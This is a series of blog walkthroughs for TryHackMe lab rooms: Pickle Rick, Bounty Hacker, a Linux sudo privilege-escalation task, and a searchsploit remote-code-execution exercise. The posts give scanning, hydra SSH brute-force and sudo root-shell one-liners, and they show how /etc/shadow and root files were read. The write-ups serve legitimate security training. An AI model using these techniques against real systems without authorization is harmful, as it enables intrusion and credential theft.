and we get the flag in seconds. I hope this short and easy tutorial helped anyone getting stuck solving this room. audittrsi

Wednesday, February 23, 2022

TryHackMe - Pickle Rick - walkthrough

Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
It is a CTF room on the TryHackMe page; if you are a fan of the Rick and Morty cartoon you should definitely try to solve it. It is not that hard and you can solve it pretty fast.
  1. step:
  2. Start the target machine that you will try to exploit and start the AttackBox machine.
  3. step:
  4. As usual we try an nmap scan to check which ports are open on the target machine with the command:

    nmap -sC -sV Target_IP


    With only 2 ports open we check the web page.
  5. step:
  6. There is nothing much on the page, but is there? We check the page source code, where we find a username which might be useful in the next steps.
  7. step:
  8. With the use of gobuster we scan the webpage to find hidden files or directories. I used the following command:

    gobuster dir -t 40 -u 10.10.151.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php,txt -t 60


  9. step:
  10. We find the login.php page but we are missing the password. We check the robots.txt file and get a possible password candidate for the login, which, together with the username from the page source, turns out to be the actual login.
  11. step:
  12. We end up on a command panel where we can write commands like ls, and we can see interesting files there with the Q1 answer ingredient. We try opening the file with the cat command (cat File_name.txt) but it doesn't allow us.
    We try the less command (less File_name.txt) and voila, we opened it and can answer Q1.
  13. step:
  14. In this step we check the clue.txt file, which says that we should look around the directories for the second ingredient. We look in other directories and in /home/rick/ we find the file "second ingredients". Since spaces in file names and Linux aren't good friends we need to use the less command like this:

    less '/home/rick/second ingredients'


    And voila we have 2nd ingredient and we can answer the Q2.
  15. step:
  16. with command

    sudo -l

    we check what we can run as root.
  17. step:
  18. we can try

    sudo ls -la /root

    and we find 3rd.txt
  19. step:
  20. Since we cannot open the file in its folder we can try copying it to another directory and changing its permissions:

    sudo cp /root/3rd.txt /var/www/html/ && sudo chmod 777 /var/www/html/3rd.txt

  21. step:
  22. In the browser open the file via Target_IP/3rd.txt and we can answer the last Q3 in this room.
I hope anyone who gets stuck finds this writeup helpful.

Saturday, February 19, 2022

TryHackMe - Linux PrivEsc - Task 6 - Privilege Escalation : Sudo

This is probably one of the easiest types of PrivEsc tasks.
With the command:

sudo -l

We check what services we can run as root, and with this info we can answer Q1.
From the output of the command we see 3 services/programs that we can run as root. Now that we have this information we can head over to GTFOBins to check, for each service/program, how we can gain root access to the system.
  • Find
  • sudo find . -exec /bin/sh \; -quit

  • Less
  • sudo less /etc/profile
    !/bin/sh

  • nano
  • sudo nano
    ^R^X
    reset; sh 1>&0 2>&0


Note about getting root via nano: enter one command at a time; ^R is CTRL + R and ^X is CTRL + X.
To answer Q2 we run:

find / -type f -name flag2.txt 2>/dev/null

so that we find the path to the flag2.txt file.
To answer Q3 we need to check GTFOBins to get the command.
To answer Q4 we open /etc/shadow to find the answer. I hope this post is helpful for anyone stuck at solving this task.

Sunday, February 6, 2022

TryHackMe - Bounty Hacker -walkthrough

Bounty Hacker is one of easy rooms on TryHackMe.com
I was able to finish it in a couple of minutes, with some reference from other similar rooms like this one.
  1. First step

  2. In this step you deploy the target VM and start the AttackBox if you don't have it up already. It takes a minute or two to start up.

  3. Second step

  4. We use nmap to scan the target VM.
    nmap -A -T4 _IP_target_VM

    The command takes some time to scan and then shows us which ports are open. You can see 3 ports open: 21 with FTP, 22 ssh and 80 with an Apache server.

  5. Third step

  6. As FTP is open and it allows you to connect as the anonymous user, we try to connect to the FTP server on the target machine with the command:
    ftp IP_target_VM

    When prompted for a username you enter anonymous. We check which files we can find on the server; there are 2 files. One contains a note from one user (this is also the answer to Q3) and the other is a list of what looks like passwords. You can download the files with the command:
    get file_name

  7. Fourth step

  8. We will use the hydra brute forcing tool to check whether any of the passwords from the list we obtained from the FTP server work. I used the following command:
    hydra target_VM_IP ssh -l lin -P path_to_the_password_list -s 22 -vV

    For the SSH user I used the one I found in the file on the FTP server.

  9. Fifth step

  10. After Hydra finishes its work and you get the correct password you can ssh to the target VM.

  11. Sixth step

  12. When we are logged in to the server I tried to find the user flag and write the location of the file into a user-flag file:
    find / -type f -name user.txt 2>/dev/null > user-flag

  13. Seventh step

  14. In this step we check which commands the current user can run with sudo. We use:
    sudo -l

    As we see, there is only one command we can run. We head over to GTFOBins and check which command to run. Copy and paste the command into the command line and voila, we have root access.
  15. Eighth step

  16. The last step is to find the root.txt file; we write its location to a root-flag file:
    find / -type f -name root.txt 2>/dev/null > /tmp/root-flag


I hope this helps the people who might get stuck while solving this room.

Sunday, January 30, 2022

TryHackMe - Exploit Vulnerabilities module - Task 5 - Practical: Manual Exploitation

This is my first writeup/walkthrough post for the TryHackMe website.
TryHackMe is an online platform for learning cyber security, using hands-on exercises and labs.
This post refers to Task 5 - Practical: Manual Exploitation, which is part of the Exploit Vulnerabilities module in the THM Jr Penetration Tester course.
Task 5 is the final task in this submodule and shows a practical example of the things you learned in the previous tasks.

First step is to start the VM that you will try to exploit; as the description says, it requires a few minutes to boot up. If you will use the AttackBox on their site, don't forget to start it too.

Second step - To answer Q1 you just need to open the website that is hosted on the VM you started in the first step. Scroll down to the bottom of the page and voila, you will find the name and version of the website.

Third step - Now that you know the website version you need to find a way to exploit it and gain access. You could also use online tools, but Task 5 aims towards using the searchsploit tool that is installed and ready to use in the AttackBox machine. We use the following command:

searchsploit online book store

We get 4 different results, but we choose the last one from the list, which offers remote code execution.


Fourth step - To start the exploit you will use the following command:

python name_of_script.py VM_IP

Since I was not in the same directory as the exploit script I got an error that the exploit script was not found, so I used:

locate 47887.py

With that I found the correct location of the exploit script and then I could run it without errors:

python path_to_the_exploit_/47887.py VM_ip_Address

You are then only prompted to continue with the exploit, and in a matter of seconds you get access to a shell on the VM.

Fifth step - finding the flag.txt file and the answer to Q3 of this task.
This did not require much searching, since the file is located in the current folder, and I used

cat flag.txt

to display the flag.txt file content. I hope that this post is helpful for anyone trying to solve this challenge. audittrsi
